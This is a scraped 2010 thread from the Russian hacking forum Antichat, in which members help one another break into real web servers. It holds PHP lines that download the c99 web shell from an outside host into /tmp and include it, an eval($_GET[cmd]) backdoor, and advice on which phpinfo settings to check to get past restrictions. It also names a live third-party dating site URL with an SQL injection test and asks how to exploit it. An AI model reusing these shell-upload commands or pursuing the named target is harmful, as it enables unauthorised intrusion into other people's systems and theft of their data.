Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.05.2010, 13:16
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
Сообщение от DrakonHaSh
: )))) да я смотрю ты реальный знаток : ))))
а еще я умею gif тоже исполнять и умею php делать текстом : ))))
зайти по ссылке дабы больше не лохаться так 
Ну... я же по чужим ссылкам не хожу. И не знаю что там!!
Так что не надо выЁ!!
|
|
|

22.05.2010, 13:19
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме: 92208
Репутация:
6
|
|
Сообщение от DrakonHaSh
ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом
CTAPu4OK
попробуй так
команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
команда 2.
include("/tmp/qwe.php");
Тоже не как =( выполняется без ошибок, но файла на сервере нет.
Через выполнение пхп и линукс команд я уже все что знал испробовал, переименовывал, перемещал, пытался записывать в уже имеющиеся файлы данные.
У меня уже был такой случай, вот точно такой же, так же фильтровались кавычки, и из за них я нечего не мог сделать, сам не справился, попросил знакомого что бы помог, он с легкостью залил шелл через sql inj, а как не говорит =(
|
|
|

22.05.2010, 13:32
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме: 869744
Репутация:
18
|
|
CTAPu4OK
eval($_GET[cmd]); пробовал?
|
|
|

22.05.2010, 13:44
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме: 92208
Репутация:
6
|
|
Сообщение от GOGA075
CTAPu4OK
eval($_GET[cmd]); пробовал?
Скрипт не пашет
Но это получится вот так
eval($_GET[cmd]);
exit;
т.е. если бы он и заработал, я все равно бы нечего не смог сделать) после каждого выполнения скрипта exit; закрывает работу со скриптом, а без exit; експлойт не пашет =(((
Я уже 2 дня над этим парюсь(
|
|
|

22.05.2010, 13:45
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
CTAPu4OK
Надеюсь ты сам понимаешь что хочешь?
Объясни по русски, что у тебя там имеется в наличии
1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл?
2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь?
phpinfo() покажи тут. А именно диррективы
allow_url_fopen
allow_url_include
disable_functions
magic_quotes_gpc
open_basedir
safe_mode
И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.
|
|
|

22.05.2010, 13:56
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
что-то нехватает фантазии раскрутить: http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.
|
|
|

22.05.2010, 14:14
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от pinch
там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.
https://forum.antichat.ru/showpost.php?p=2149589&postcount=13265
https://forum.antichat.ru/showpost.php?p=2152999&postcount=13287
Ты уж ответь на вопрос, будь так добр
|
|
|

22.05.2010, 14:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
все вы про "вопросы на низком уровне"
что это такое?
во интересно,все любят говорит,а когда задаешь вопрос никого нету 
Последний раз редактировалось Konqi; 22.05.2010 в 14:23..
|
|
|

22.05.2010, 14:22
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме: 3132379
Репутация:
1069
|
|
Сообщение от Konqi
все вы про "вопросы на низком уровне"
что это такое? 
при ошибке "Microsoft VBScript runtime error '800a000d'" - фиг извлечёшь данные, это говоря об этом (типа "низкоуровневые запросы")
а в данном случае извлечь возможно
Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?
я адвокат только сам себе
немного не так выразился
в аксессе возможны инъекции
Последний раз редактировалось aka_zver; 22.05.2010 в 14:36..
|
|
|

22.05.2010, 14:26
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от aka_zver
он имел в виду, что запросы передаются на уровне VB скриптов, при такой ошибке фиг извлечёшь данные
Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?
Последний раз редактировалось Jokester; 22.05.2010 в 14:31..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|